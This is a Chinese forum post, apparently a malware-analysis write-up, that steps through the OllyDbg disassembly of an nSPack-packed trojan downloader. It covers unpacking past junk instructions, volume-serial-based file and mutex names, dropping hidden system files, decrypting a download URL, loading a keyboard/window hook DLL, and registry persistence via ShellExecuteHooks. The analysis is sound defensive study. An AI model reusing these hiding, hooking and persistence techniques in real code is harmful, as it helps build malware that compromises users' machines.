好友
阅读权限40
听众
最后登录1970-1-1
|
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子! 病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途! 禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
本帖最后由 是昔流芳 于 2011-2-11 12:21 编辑
程序加了 nSPack 3.7 -> North Star/Liu Xing Ping [Overlay]
OD载入0041E37B > 9C pushfd
0041E37C 60 pushad
0041E37D E8 00000000 call down.0041E382
0041E382 5D pop ebp
0041E383 83ED 07 sub ebp,7
0041E386 8D8D 01FDFFFF lea ecx,dword ptr ss:[ebp-2FF]
0041E38C 8039 01 cmp byte ptr ds:[ecx],1
直接搜索
popad
popfd0041E5E1 61 popad
0041E5E2 9D popfd
0041E5E3 B8 01000000 mov eax,1
0041E5E8 C2 0C00 retn 0C
0041E5EB 61 popad
0041E5EC 9D popfd
0041E5ED - E9 97DAFFFF jmp down.0041C089 //跳到fOEP,F7
进来看看好像oep被动了手脚,看看好像是一些anti+花指令0041C089 55 push ebp
0041C08A 8BEC mov ebp,esp
0041C08C 6A FF push -1
0041C08E 68 66666600 push 666666
0041C093 68 88888800 push 888888
0041C098 64:A1 00000000 mov eax,dword ptr fs:[0]
0041C09E 50 push eax
0041C09F 64:8925 0000000>mov dword ptr fs:[0],esp
0041C0A6 58 pop eax
0041C0A7 64:A3 00000000 mov dword ptr fs:[0],eax
0041C0AD 90 nop
0041C0AE 72 0C jb short down.0041C0BC
0041C0B0 73 0A jnb short down.0041C0BC
0041C0B2 90 nop
0041C0B3 90 nop
0041C0B4 90 nop
0041C0B5 90 nop
0041C0B6 72 10 jb short down.0041C0C8 //明显花指令
0041C0B8 73 0E jnb short down.0041C0C8
0041C0BA 0000 add byte ptr ds:[eax],al
0041C0BC 58 pop eax
0041C0BD 58 pop eax
0041C0BE 58 pop eax
0041C0BF 58 pop eax
0041C0C0 ^ 72 F0 jb short down.0041C0B2 //明显花指令
0041C0C2 ^ 73 EE jnb short down.0041C0B2
0041C0C4 0000 add byte ptr ds:[eax],al
0041C0C6 0000 add byte ptr ds:[eax],al
0041C0C8 90 nop
0041C0C9 90 nop
0041C0CA 50 push eax
0041C0CB 58 pop eax
0041C0CC 90 nop
0041C0CD 90 nop
0041C0CE 83C4 01 add esp,1
0041C0D1 90 nop
0041C0D2 90 nop
0041C0D3 90 nop
0041C0D4 83C4 FF add esp,-1
0041C0D7 90 nop
0041C0D8 ^ 0F82 76D8FEFF jb down.00409954 //明显花指令,调相oep
0041C0DE ^ 0F83 70D8FEFF jnb down.00409954
00409954 55 push ebp ; OEP
00409955 8BEC mov ebp,esp
00409957 B9 0E000000 mov ecx,0E
0040995C 6A 00 /push 0
0040995E 6A 00 |push 0
00409960 49 |dec ecx
00409961 ^ 75 F9 \jnz short down.0040995C
00409963 51 push ecx
00409964 53 push ebx
00409965 56 push esi
004099A6 50 push eax
004099A7 8D45 DC lea eax,dword ptr ss:[ebp-24]
004099AA E8 E9B1FFFF call down.00404B98 ; F7进去溜达一下,获取分区的卷标
004099AF 8B4D DC mov ecx,dword ptr ss:[ebp-24] ; ASCII "4634ED47")
004099B2 8D45 E0 lea eax,dword ptr ss:[ebp-20]
004099B5 BA A89D4000 mov edx,down.00409DA8 ; ASCII ":")
004099BA E8 B59CFFFF call down.00403674 ; 上面两个字符串连接
004099BF 8B45 E0 mov eax,dword ptr ss:[ebp-20] ; ":\4634ED47"
004099C2 8D55 E4 lea edx,dword ptr ss:[ebp-1C]
004099C5 E8 32A9FFFF call down.004042FC
004099CA 8B45 E4 mov eax,dword ptr ss:[ebp-1C] ; ":\4634ED47")
004099CD 5A pop edx
004099CE E8 3D9FFFFF call down.00403910
004099D3 85C0 test eax,eax
00404BD9 68 D04C4000 push down.00404CD0 ; ASCII "C:"
00404BDE E8 D9F4FFFF call down.004040BC ;跳到 kernel32.GetVolumeInformationA,看堆栈有详细的信息
00404BE3 8D4D F0 lea ecx,dword ptr ss:[ebp-10]
00404BE6 0FB745 FC movzx eax,word ptr ss:[ebp-4]
00404BEA BA 04000000 mov edx,4
00404BEF E8 ACF6FFFF call down.004042A0
00404BF4 8B45 F0 mov eax,dword ptr ss:[ebp-10] ; (ASCII "7ED4")
00404BF7 50 push eax
00404BF8 8B45 FC mov eax,dword ptr ss:[ebp-4]
00404BFB E8 8CF5FFFF call down.0040418C
00404C00 0FB7C0 movzx eax,ax
00404C03 8D4D EC lea ecx,dword ptr ss:[ebp-14]
00404C06 BA 04000000 mov edx,4
00404C0B E8 90F6FFFF call down.004042A0
00404C10 8B55 EC mov edx,dword ptr ss:[ebp-14] ; (ASCII "4463")
堆栈的信息
0012FED4 00404CD0 |RootPathName = "C:"
0012FED8 00000000 |VolumeNameBuffer = NULL
0012FEDC 00000000 |MaxVolumeNameSize = 0
0012FEE0 0012FF24 |pVolumeSerialNumber = 0012FF24
0012FEE4 0012FF20 |pMaxFilenameLength = 0012FF20
0012FEE8 0012FF1C |pFileSystemFlags = 0012FF1C
0012FEEC 00000000 |pFileSystemNameBuffer = NULL
0012FEF0 00000000 \pFileSystemNameSize = NULL
0012FEF4 0012FF34 指向下一个 SEH 记录的指针
004099F4 E8 8F9EFFFF call down.00403888
004099F9 8B4D D4 mov ecx,dword ptr ss:[ebp-2C]
004099FC 8D45 D8 lea eax,dword ptr ss:[ebp-28]
004099FF BA B49D4000 mov edx,down.00409DB4 ; ASCII "Explorer.exe "
00409A04 E8 6B9CFFFF call down.00403674
00409A09 8B45 D8 mov eax,dword ptr ss:[ebp-28]
00409A0C E8 179EFFFF call down.00403828
00409A11 50 push eax
00409A12 E8 25A7FFFF call down.0040413C ; jmp 到 kernel32.WinExec
00409A17 8D55 CC lea edx,dword ptr ss:[ebp-34]
00409A1A B8 01000000 mov eax,1
00409A1F E8 44AAFFFF call down.00404468 ; 获取自身路径,进去的话可以看到通过以下2个函数获得的
{
0040448C E8 F3FBFFFF call down.00404084 ; jmp 到 kernel32.GetModuleFileNameA
00404491 8BC8 mov ecx,eax
00404493 8BD4 mov edx,esp
00404495 8BC3 mov eax,ebx
00404497 E8 04F1FFFF call down.004035A0
0040449C EB 1E jmp short down.004044BC
0040449E E8 C9FBFFFF call down.0040406C ; jmp 到 kernel32.GetCommandLineA
}
00409A24 8B45 CC mov eax,dword ptr ss:[ebp-34]
00409A27 50 push eax
00409A28 8D45 C8 lea eax,dword ptr ss:[ebp-38]
00409A2B E8 68B1FFFF call down.00404B98 ; 获取卷标"4634ED47"
00409A30 8B55 C8 mov edx,dword ptr ss:[ebp-38] ; (ASCII "4634ED47")
00409A4F E8 38B3FFFF call down.00404D8C ; F7进去是获取系统目录
00409A54 8B45 C4 mov eax,dword ptr ss:[ebp-3C] ; "C:\WINDOWS\4634ED47.hlp")
00409A57 E8 CC9DFFFF call down.00403828
00409A5C 50 push eax ; inifilename"C:\WINDOWS\4634ED47.hlp")
00409A5D 6A 32 push 32
00409A5F 68 2CB74000 push down.0040B72C
00409A64 68 C49D4000 push down.00409DC4
00409A69 68 C89D4000 push down.00409DC8 ; ASCII "RC"
00409A6E 68 CC9D4000 push down.00409DCC ; ASCII "status"
00409A73 E8 1CA6FFFF call down.00404094 ; jmp 到 kernel32.GetPrivateProfileStringA,看到这里应该是写一些东西,开始有小动作了
00409AD7 8D45 B4 lea eax,dword ptr ss:[ebp-4C]
00409ADA E8 F5B1FFFF call down.00404CD4 ; 获取互斥体名字"E4634ED47"
00409ADF 8B45 B4 mov eax,dword ptr ss:[ebp-4C]
00409AE2 E8 419DFFFF call down.00403828 ; 是否成功
00409AE7 50 push eax ; /MutexName = "E4634ED47"
00409AE8 6A 00 push 0
00409AEA 68 01001F00 push 1F0001
00409AEF E8 00A6FFFF call down.004040F4 ; jmp 到 kernel32.OpenMutexA
00409AF4 85C0 test eax,eax
00409AF6 0F85 3E020000 jnz down.00409D3A ; 是否成功
00409AFC 8D45 B0 lea eax,dword ptr ss:[ebp-50]
00409AFF E8 2CB2FFFF call down.00404D30 ; 获取"D4634ED47"
00409B04 8B45 B0 mov eax,dword ptr ss:[ebp-50]
00409B07 E8 1C9DFFFF call down.00403828
00409B0C 50 push eax ; /MutexName = "E4634ED47"
00409B0D 6A 00 push 0
00409B0F 68 01001F00 push 1F0001
00409B14 E8 DBA5FFFF call down.004040F4 ; jmp 到 kernel32.OpenMutexA
00409B19 85C0 test eax,eax
00409B1B 0F85 19020000 jnz down.00409D3A ; 是否成功
00409B21 8D45 AC lea eax,dword ptr ss:[ebp-54]
00409B24 E8 ABB1FFFF call down.00404CD4 ; 获取(ASCII "E4634ED47")
00409B29 8B45 AC mov eax,dword ptr ss:[ebp-54]
00409B43 E8 58B3FFFF call down.00404EA0 ; F7进去是获得GetWindowsDirectoryA
00409B48 8B55 A8 mov edx,dword ptr ss:[ebp-58] ; (ASCII "C:\Program Files\Common Files\Microsoft Shared\MSINFO\4634ED47.dat")
00409B4B B8 18B74000 mov eax,down.0040B718
00409B50 E8 AF99FFFF call down.00403504
00409B55 8D45 A4 lea eax,dword ptr ss:[ebp-5C]
00409B58 E8 A7B2FFFF call down.00404E04
00409B5D 8B55 A4 mov edx,dword ptr ss:[ebp-5C] ; (ASCII "C:\Program Files\Common Files\Microsoft Shared\MSINFO\4634ED47.dll")
00409B60 B8 1CB74000 mov eax,down.0040B71C
00409B65 E8 9A99FFFF call down.00403504
00409B6A 8D45 A0 lea eax,dword ptr ss:[ebp-60]
00409B6D E8 06B8FFFF call down.00405378 ; F7进去是获得GetWindowsDirectoryA
00409B72 FF75 A0 push dword ptr ss:[ebp-60] ; C:\WINDOWS
00409B75 68 F89D4000 push down.00409DF8 ; ASCII "Help"
00409B7A 8D45 9C lea eax,dword ptr ss:[ebp-64]
00409B7D E8 16B0FFFF call down.00404B98 ; 获取"4634ED47")
00409B82 FF75 9C push dword ptr ss:[ebp-64]
00409B85 68 089E4000 push down.00409E08 ; ASCII ".chm"
00405831 . 8B45 FC mov eax,dword ptr ss:[ebp-4]
00405834 . E8 EFDFFFFF call down.00403828
00405839 . 50 push eax ; |FileName
0040583A . E8 D5E7FFFF call down.00404014 ; \CreateFileA
0040583F . 8BF0 mov esi,eax
00405841 . 83FE FF cmp esi,-1
00405844 . 75 0D jnz short down.00405853
00405846 . 33C0 xor eax,eax
00405848 . 5A pop edx
00405849 . 59 pop ecx
0040584A . 59 pop ecx
0040584B . 64:8910 mov dword ptr fs:[eax],edx
0040584E . E9 B4020000 jmp down.00405B07
00405853 > 6A 02 push 2 ; /Origin = FILE_END
00405855 . 6A 00 push 0 ; |pOffsetHi = NULL
00405857 . 6A FD push -3 ; |OffsetLo = FFFFFFFD (-3.)
00405859 . 56 push esi ; |hFile
0040585A . E8 BDE8FFFF call down.0040411C ; \SetFilePointer
0040585F . 8D45 F0 lea eax,dword ptr ss:[ebp-10]
00405862 . BA 03000000 mov edx,3
00405867 . E8 ECE0FFFF call down.00403958
0040586C . 6A 00 push 0
0040586E . 8D45 F8 lea eax,dword ptr ss:[ebp-8]
00405871 . 50 push eax
00405872 . 6A 03 push 3
00405874 . 8D45 F0 lea eax,dword ptr ss:[ebp-10]
00405877 . E8 04E0FFFF call down.00403880
0040587C . 50 push eax ; |Buffer
0040587D . 56 push esi ; |hFile
0040587E . E8 81E8FFFF call down.00404104 ; \ReadFile
00405883 . 8B45 F0 mov eax,dword ptr ss:[ebp-10]
00405886 . BA 405B4000 mov edx,down.00405B40 ; ASCII "CNN"
0040588B . E8 E4DEFFFF call down.00403774
00405890 . 0F85 57020000 jnz down.00405AED
00405896 . 6A 02 push 2 ; /Origin = FILE_END
00405898 . 6A 00 push 0 ; |pOffsetHi = NULL
0040589A . 6A F8 push -8 ; |OffsetLo = FFFFFFF8 (-8.)
0040589C . 56 push esi ; |hFile
0040589D . E8 7AE8FFFF call down.0040411C ; \SetFilePointer
004058A2 . 8D45 EC lea eax,dword ptr ss:[ebp-14]
004058A5 . BA 05000000 mov edx,5
004058AA . E8 A9E0FFFF call down.00403958
004058AF . 6A 00 push 0
004058B1 . 8D45 F8 lea eax,dword ptr ss:[ebp-8]
004058B4 . 50 push eax
004058B5 . 6A 05 push 5
004058B7 . 8D45 EC lea eax,dword ptr ss:[ebp-14]
004058BA . E8 C1DFFFFF call down.00403880
004058BF . 50 push eax ; |Buffer
004058C0 . 56 push esi ; |hFile
004058C1 . E8 3EE8FFFF call down.00404104 ; \ReadFile
004058C6 . 8B45 EC mov eax,dword ptr ss:[ebp-14]
004058C9 . E8 4AE9FFFF call down.00404218
004058CE . 8BD8 mov ebx,eax
004058D0 . 6A 02 push 2 ; /Origin = FILE_END
004058D2 . 6A 00 push 0 ; |pOffsetHi = NULL
004058D4 . B8 F8FFFFFF mov eax,-8 ; |
004058D9 . 2BC3 sub eax,ebx ; |
004058DB . 50 push eax ; |OffsetLo
004058DC . 56 push esi ; |hFile
004058DD . E8 3AE8FFFF call down.0040411C ; \SetFilePointer
004058E2 . 8D45 F4 lea eax,dword ptr ss:[ebp-C]
00405905 . 8B45 F4 mov eax,dword ptr ss:[ebp-C] ; 密钥key
00405908 . E8 87F0FFFF call down.00404994 ; F7 进去是解密有兴趣的可以跟进溜达溜达,我跟累了。。
0040590D . 8B55 E8 mov edx,dword ptr ss:[ebp-18]
00405910 . 8D45 F4 lea eax,dword ptr ss:[ebp-C]
00405913 . E8 30DCFFFF call down.00403548
00405918 . 8BC7 mov eax,edi
0040591A . 8B55 F4 mov edx,dword ptr ss:[ebp-C] ; 解密的地址出来了我就不贴图了。。
0040591D . E8 E2DBFFFF call down.00403504
00405922 . 8B55 F4 mov edx,dword ptr ss:[ebp-C]
00405925 . B8 4C5B4000 mov eax,down.00405B4C
0040592A . E8 E1DFFFFF call down.00403910
0040592F . 8BD8 mov ebx,eax
00405931 . 68 78B64000 push down.0040B678
00405936 . 8BCB mov ecx,ebx
00405938 . 49 dec ecx
00405939 . BA 01000000 mov edx,1
0040593E . 8B45 F4 mov eax,dword ptr ss:[ebp-C] ; 解密的地址出来了。。
00409BAE |. 8B55 98 mov edx,[local.26] ; "http://127.0.0.1/1.exe^^^^^1^1^1^4634ED47^")
00409BB1 |. B8 24B74000 mov eax,down.0040B724
00409BB6 |. E8 4999FFFF call down.00403504
00409BBB |. 8D45 90 lea eax,[local.28]
00409BBE |. E8 D5AFFFFF call down.00404B98 ; 继续获取 卷标"4634ED47"
00409BC3 |. 8B55 90 mov edx,[local.28]
00409BC6 |. B8 60B74000 mov eax,down.0040B760
00409BD5 |. E8 4E9CFFFF call down.00403828 ; 获取"C:\Program Files\Common Files\Microsoft Shared\MSINFO\4634ED47.dll
00409BDA |. 8BD8 mov ebx,eax
00409BDC |. 53 push ebx ; /filename="C:\Program Files\Common Files\Microsoft Shared\MSINFO\4634ED47.dll")
00409BDD |. E8 9AA4FFFF call down.0040407C ; \GetFileAttributesA
00409BE2 |. 83F8 FF cmp eax,-1
00409BE5 |. 74 0E je short down.00409BF5
00409BE7 |. 6A 00 push 0 ; /FileAttributes = 0
00409BE9 |. 53 push ebx ; |FileName
00409BEA |. E8 25A5FFFF call down.00404114 ; \SetFileAttributesA
00409BEF |. 53 push ebx ; /FileName
00409BF0 |. E8 57A4FFFF call down.0040404C ; \DeleteFileA
00409BF5 |> A1 24B74000 mov eax,dword ptr ds:[40B724]
00409BFA |. 50 push eax
00409BFB |. 6A 01 push 1
00409BFD |. 8BCB mov ecx,ebx
00409BFF |. BA 109E4000 mov edx,down.00409E10 ; ASCII "DATEINFO"
00409C04 |. B8 0A000000 mov eax,0A
00409C09 |. E8 4EBFFFFF call down.00405B5C ; F7进去有动作了,创建了一个4634ED47.dll
{
00405B8D |. 56 push esi ; /ResourceType
00405B8E |. 57 push edi ; |ResourceName
00405B8F |. A1 50B64000 mov eax,dword ptr ds:[40B650] ; |
00405B94 |. 50 push eax ; |hModule => 00400000 (down)
00405B95 |. E8 C2E4FFFF call down.0040405C ; \FindResourceA
00405B9A |. 8BF0 mov esi,eax
00405B9C |. 85F6 test esi,esi
00405B9E |. 0F84 A7010000 je down.00405D4B
00405BA4 |. 56 push esi ; /hResource
00405BA5 |. A1 50B64000 mov eax,dword ptr ds:[40B650] ; |
00405BAA |. 50 push eax ; |hModule => 00400000 (down)
00405BAB |. E8 24E5FFFF call down.004040D4 ; \LoadResource
00405BB0 |. 8BF8 mov edi,eax
00405BB2 |. 85FF test edi,edi
00405BB4 |. 0F84 91010000 je down.00405D4B
00405BBA |. 57 push edi ; /nHandles
00405BBB |. E8 1CE5FFFF call down.004040DC ; \SetHandleCount
00405BC0 |. 8945 F4 mov [local.3],eax
00405BC3 |. 837D F4 00 cmp [local.3],0
00405BC7 |. 0F84 7E010000 je down.00405D4B
00405BCD |. 807D 08 01 cmp byte ptr ss:[ebp+8],1
00405BD1 |. 75 19 jnz short down.00405BEC
00405BD3 |. 6A 00 push 0 ; /hTemplateFile = NULL
00405BD5 |. 6A 06 push 6 ; |Attributes = HIDDEN|SYSTEM
00405BD7 |. 6A 02 push 2 ; |Mode = CREATE_ALWAYS
00405BD9 |. 6A 00 push 0 ; |pSecurity = NULL
00405BDB |. 6A 00 push 0 ; |ShareMode = 0
00405BDD |. 68 000000C0 push C0000000 ; |Access = GENERIC_READ|GENERIC_WRITE
00405BE2 |. 53 push ebx ; |FileName
00405BE3 |. E8 2CE4FFFF call down.00404014 ; \CreateFileA
00405BE8 |. 8BD8 mov ebx,eax
00405BEA |. EB 17 jmp short down.00405C03
00405BEC |> 6A 00 push 0 ; /hTemplateFile = NULL
00405BEE |. 6A 00 push 0 ; |Attributes = 0
00405BF0 |. 6A 02 push 2 ; |Mode = CREATE_ALWAYS
00405BF2 |. 6A 00 push 0 ; |pSecurity = NULL
00405BF4 |. 6A 00 push 0 ; |ShareMode = 0
00405BF6 |. 68 000000C0 push C0000000 ; |Access = GENERIC_READ|GENERIC_WRITE
00405BFB |. 53 push ebx ; |FileName
00405BFC |. E8 13E4FFFF call down.00404014 ; \CreateFileA
00405C01 |. 8BD8 mov ebx,eax
00405C03 |> 83FB FF cmp ebx,-1
00405C06 |. 0F84 3F010000 je down.00405D4B
00405C0C |. 56 push esi ; /hResource
00405C0D |. A1 50B64000 mov eax,dword ptr ds:[40B650] ; |
00405C12 |. 50 push eax ; |hModule => 00400000 (down)
00405C13 |. E8 0CE5FFFF call down.00404124 ; \SizeofResource
00405C18 |. 8BF0 mov esi,eax
00405C1A |. 6A 00 push 0
00405C1C |. 8D45 F8 lea eax,[local.2]
00405C1F |. 50 push eax
00405C20 |> 56 push esi ; |nBytesToWrite
00405C21 |. 8B45 F4 mov eax,[local.3] ; |
00405C24 |. 50 push eax ; |Buffer
00405C25 |. 53 push ebx ; |hFile
00405C26 |. E8 19E5FFFF call down.00404144 ; \WriteFile
}
00409C0E |. 6A 07 push 7 ; /FileAttributes = READONLY|HIDDEN|SYSTEM
00409C10 |. 53 push ebx ; |FILENAME=e"C:\Program Files\Common Files\Microsoft Shared\MSINFO\4634ED47.dll")
00409C11 |. E8 FEA4FFFF call down.00404114 ; \SetFileAttributesA
00409C16 |. A1 18B74000 mov eax,dword ptr ds:[40B718]
00409C1B |. E8 089CFFFF call down.00403828
00409C20 |. 8BF0 mov esi,eax ; "C:\Program Files\Common Files\Microsoft Shared\MSINFO\4634ED47.dat")
00409C22 |. 56 push esi ; /FileName
00409C23 |. E8 54A4FFFF call down.0040407C ; \GetFileAttributesA
00409C43 |. E8 20A8FFFF call down.00404468 ; 获取自身路径
00409C48 |. 8B45 8C mov eax,[local.29]
00409C4B |. E8 D89BFFFF call down.00403828
00409C50 |. 50 push eax ; |existingfilename=C:\Documents and Settings\Administrator\桌面\down.exe
00409C51 |. E8 B6A3FFFF call down.0040400C ; \CopyFileA 调用复制自身到C:\Program Files\Common Files\Microsoft Shared\MSINFO\4634ED47.dat
00409C56 |. 6A 07 push 7 ; /FileAttributes = READONLY|HIDDEN|SYSTEM 文件属性值
00409C58 |. 56 push esi ; |FileName
00409C59 |. E8 B6A4FFFF call down.00404114 ; \SetFileAttributesA 设置文件属性
00409C5E |. A1 20B74000 mov eax,dword ptr ds:[40B720]
00409C63 |. E8 C09BFFFF call down.00403828
00409C68 |. 8BF8 mov edi,eax
00409C6A |. 57 push edi ; /FileName
00409C6B |. E8 0CA4FFFF call down.0040407C ; \GetFileAttributesA 获得文件属性
00409C70 |. 83F8 FF cmp eax,-1 判断是否为-1
00409C73 |. 74 0E je short down.00409C83
00409C75 |. 6A 00 push 0 ; /FileAttributes = 0
00409C77 |. 57 push edi ; |filename="C:\WINDOWS\Help\4634ED47.chm")
00409C78 |. E8 97A4FFFF call down.00404114 ; \SetFileAttributesA 设置文件属性
00409C7D |. 57 push edi ; /FileName
00409C7E |. E8 C9A3FFFF call down.0040404C ; \DeleteFileA
00409C83 |> 6A FF push -1 ; /FailIfExists = TRUE
00409C85 |. 57 push edi ; |newfilename="C:\WINDOWS\Help\4634ED47.chm")
00409C86 |. 56 push esi ; |exitstingfilename="C:\Program Files\Common Files\Microsoft Shared\MSINFO\4634ED47.dat")00409C87 |. E8 80A3FFFF call down.0040400C ; \CopyFileA 复制这么多。。。
00409C8C |. 6A 07 push 7 ; /FileAttributes = READONLY|HIDDEN|SYSTEM
00409C8E |. 57 push edi ; |filename="C:\WINDOWS\Help\4634ED47.chm")
00409C8F |. E8 80A4FFFF call down.00404114 ; \SetFileAttributesA
00409C94 |. 53 push ebx ; /filename= C:\Program Files\Common Files\Microsoft Shared\MSINFO\4634ED47.dll
00409C95 |. E8 32A4FFFF call down.004040CC ; \LoadLibraryA 加载hook
00409C9A 8BD8 mov ebx,eax
00409C9C 85DB test ebx,ebx
00409C9E 75 07 jnz short down.00409CA7 ; 判断是否加载成功,不成功就退出
00409CA0 6A 00 push 0
00409CA2 E8 ADA3FFFF call down.00404054 ; jmp 到 kernel32.ExitProcess
00409CA7 |> \68 1C9E4000 push down.00409E1C ; //ProcNameOrOrdinal = "JumpHookOn"
00409CAC |. 53 push ebx ; |hModule
00409CAD |. E8 EAA3FFFF call down.0040409C ; \GetProcAddress
00409CB2 |. 89C6 mov esi,eax ; (4634ED47.JumpHookOn)
00409CB4 |. B8 64B74000 mov eax,down.0040B764
00409CB9 |. BA 309E4000 mov edx,down.00409E30 ; ASCII "||||||||||||||||||"
00409CBE |. E8 4198FFFF call down.00403504
00409CC3 |. B8 64B74000 mov eax,down.0040B764
00409CC8 |. BA 4C9E4000 mov edx,down.00409E4C ; ASCII "__________________"
00409CCD |. E8 3298FFFF call down.00403504
00409CD2 |. B8 64B74000 mov eax,down.0040B764
00409CD7 |. BA 689E4000 mov edx,down.00409E68 ; ASCII " "
00409CDC |. E8 2398FFFF call down.00403504
00409CE1 |. 68 909E4000 push down.00409E90 ; //ProcNameOrOrdinal = "JumpHookOff"
00409CE6 |. 53 push ebx ; |hModule
00409CE7 |. E8 B0A3FFFF call down.0040409C ; \GetProcAddress
00409CEC |. A3 28B74000 mov dword ptr ds:[40B728>; (4634ED47.JumpHookOff)
00409CF1 |. FFD6 call esi ; 调用SetWindowsHookExA
00409CF3 |. 68 10B74000 push down.0040B710 ; /pThreadId = down.0040B710
00409CF8 |. 6A 00 push 0 ; |CreationFlags = 0
00409CFA |. 6A 01 push 1 ; |pThreadParm = 00000001
00409CFC |. 68 CC964000 push down.004096CC ; |ThreadFunction = down.004096CC
00409D01 |. 6A 00 push 0 ; |StackSize = 0
00409D03 |. 6A 00 push 0 ; |pSecurity = NULL
00409D05 |. E8 3AA3FFFF call down.00404044 ; \CreateThread
00409D0A |. EB 14 jmp short down.00409D20
00409D0C |> 68 F4B64000 /push down.0040B6F4 ; /pMsg = WM_NULL
00409D11 |. E8 6EA4FFFF |call down.00404184 ; \TranslateMessage 要处理的消息
00409D16 |. 68 F4B64000 |push down.0040B6F4 ; /pMsg = WM_NULL
00409D1B |. E8 3CA4FFFF |call down.0040415C ; \DispatchMessageA
00409D20 |> 6A 00 push 0 ; /MsgFilterMax = 0
00409D22 |. 6A 00 |push 0 ; |MsgFilterMin = 0
00409D24 |. 6A 00 |push 0 ; |hWnd = NULL
00409D26 |. 68 F4B64000 |push down.0040B6F4 ; |pMsg = down.0040B6F4
00409D2B |. E8 3CA4FFFF |call down.0040416C ; \GetMessageA
00404E32 E8 8DF2FFFF call down.004040C4 ; jmp 到 kernel32.GetWindowsDirectoryA
00404E37 8D45 FC lea eax,dword ptr ss:[ebp-4]
00404E3A 8B13 mov edx,dword ptr ds:[ebx]
00404E3C 8A12 mov dl,byte ptr ds:[edx]
00404E3E E8 8DE7FFFF call down.004035D0
00404E43 FF75 FC push dword ptr ss:[ebp-4]
00404E46 FF35 ACA04000 push dword ptr ds:[40A0AC] ; ASCII ":\Program Files\Common Files\Microsoft Shared\MSINFO"
00404E4C 8D45 F8 lea eax,dword ptr ss:[ebp-8]
00404E4F E8 44FDFFFF call down.00404B98
00404E54 FF75 F8 push dword ptr ss:[ebp-8] ; (ASCII "4634ED47")
00404E57 68 984E4000 push down.00404E98 ; ASCII ".dll"
00404E5C 8BC3 mov eax,ebx
00404E5E BA 04000000 mov edx,4
00404E63 E8 80E8FFFF call down.004036E8 ; F7 进去瞧瞧,循环获取一些东西
0040373E 8B449C 18 mov eax,dword ptr ss:[esp+ebx*4+18]
00403742 89F2 mov edx,esi
00403744 85C0 test eax,eax
00403746 74 0A je short down.00403752
00403748 8B48 FC mov ecx,dword ptr ds:[eax-4]
0040374B 01CE add esi,ecx
0040374D E8 5EEEFFFF call down.004025B0
00403752 4B dec ebx
00403753 ^ 75 E9 jnz short down.0040373E ; 循环获取 ASCII "C:\Program Files\Common Files\Microsoft Shared\MSINFO\4634ED47.dll"
00408B8B |. B8 148E4000 mov eax,down.00408E14 ; ASCII "Explorer.Exe"
00408B90 |. E8 BFE9FFFF call down.00407554 ; F7,有东西
00408B95 |. B8 2C8E4000 mov eax,down.00408E2C ; ASCII "TIMPlatform.exe"
00408B9A |. E8 B5E9FFFF call down.00407554 ; 和上面的call一样
00408B9F |. 6A 00 push 0 ; /lParam = 0
00408BA1 |. 6A 00 push 0 ; |wParam = 0
00408BA3 |. 6A 1A push 1A ; |Message = WM_WININICHANGE
00408BA5 |. 68 FFFF0000 push 0FFFF ; |hWnd = HWND_BROADCAST
00408BAA |. E8 C5B5FFFF call down.00404174 ; \PostMessageA
004075BD |> /8D95 D0FEFFFF /lea edx,[local.76]
004075C3 |. |8B45 FC |mov eax,[local.1]
004075C6 |. |E8 31CDFFFF |call down.004042FC
004075CB |. |8B85 D0FEFFFF |mov eax,[local.76]
004075D1 |. |50 |push eax
004075D2 |. |8D85 C4FEFFFF |lea eax,[local.79]
004075D8 |. |8D56 24 |lea edx,dword ptr ds:[esi+24]
004075DB |. |B9 04010000 |mov ecx,104
004075E0 |. |E8 2BC0FFFF |call down.00403610
004075E5 |. |8B85 C4FEFFFF |mov eax,[local.79]
004075EB |. |8D95 C8FEFFFF |lea edx,[local.78]
004075F1 |. |E8 AEDAFFFF |call down.004050A4
004075F6 |. |8B85 C8FEFFFF |mov eax,[local.78]
004075FC |. |8D95 CCFEFFFF |lea edx,[local.77]
00407602 |. |E8 F5CCFFFF |call down.004042FC
00407607 |. |8B85 CCFEFFFF |mov eax,[local.77]
0040760D |. |5A |pop edx
0040760E |. |E8 FDC2FFFF |call down.00403910
00407613 |. |85C0 |test eax,eax
00407615 |. |7E 08 |jle short down.0040761F
00407617 |. |8B46 08 |mov eax,dword ptr ds:[esi+8]
0040761A |. |E8 15FFFFFF |call down.00407534
0040761F |> |8BD6 |mov edx,esi
00407621 |. |8BC3 |mov eax,ebx
00407623 |. |E8 78EAFFFF |call down.004060A0
00407628 |. |83F8 01 |cmp eax,1
0040762B |. |1BC0 |sbb eax,eax
0040762D |. |40 |inc eax
0040762E |> |84C0 test al,al
00407630 |.^\75 8B \jnz short down.004075BD ; 循环遍历进程
00408B9F |. 6A 00 push 0 ; /lParam = 0
00408BA1 |. 6A 00 push 0 ; |wParam = 0
00408BA3 |. 6A 1A push 1A ; |Message = WM_WININICHANGE
00408BA5 |. 68 FFFF0000 push 0FFFF ; |hWnd = HWND_BROADCAST
00408BAA |. E8 C5B5FFFF call down.00404174 ; \PostMessageA
00408BAF |. B8 3C8E4000 mov eax,down.00408E3C
00408BB4 |. 33D2 xor edx,edx
00408BB6 |. E8 29C5FFFF call down.004050E4 ; F7注册表相关,创建自启动
00405216 |. 8BD0 mov edx,eax ; "SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks"
00405218 |. B8 02000080 mov eax,80000002
0040521D |. 59 pop ecx
0040521E |. E8 F9F2FFFF call down.0040451C
00405223 |. 68 24534000 push down.00405324
00405228 |. 68 30534000 push down.00405330 ; ASCII "CLSID"
0040522D |. FF75 F8 push [local.2]
00405230 |. 68 40534000 push down.00405340 ; ASCII "\InProcServer32"
00405235 |. 8D45 E0 lea eax,[local.8]
00405238 |. BA 03000000 mov edx,3
0040523D |. E8 A6E4FFFF call down.004036E8
00405242 |. 8B45 E0 mov eax,[local.8] ; "CLSID\{4ED44634-4634-ED47-34ED-634D4634ED47}\InProcServer32")
00405245 |. E8 DEE5FFFF call down.00403828
0040524A |. 8BD0 mov edx,eax
0040524C |. B9 24534000 mov ecx,down.00405324
00405251 |. B8 00000080 mov eax,80000000
00405256 |. E8 09F5FFFF call down.00404764 ; F7溜达一下,有动作了,创建自启动
0040525B |. 68 30534000 push down.00405330 ; ASCII "CLSID"
00405260 |. FF75 F8 push [local.2]
